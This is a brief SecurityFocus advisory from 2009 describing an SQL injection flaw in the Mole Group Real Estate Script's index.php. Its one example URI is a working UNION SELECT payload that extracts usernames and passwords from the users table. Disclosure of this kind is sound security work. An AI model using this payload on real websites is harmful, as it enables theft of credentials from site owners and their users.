Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Mole Group Real Estate Script 'index.php' SQL Injection Vulnerability

Attackers can exploit these issues via a browser.

The following example URI is available:

http://www.example.com/index.php?go=listings&listing_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,CONVERT(CONCAT(0x3C666F6E7420636F6C6F723D7265643E,username,0x3a,password,0x3C2F666F6E743E)/**/using/**/latin1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/FROM/**/users/**/LIMIT/**/0,1/*







 

Privacy Statement
Copyright 2009, SecurityFocus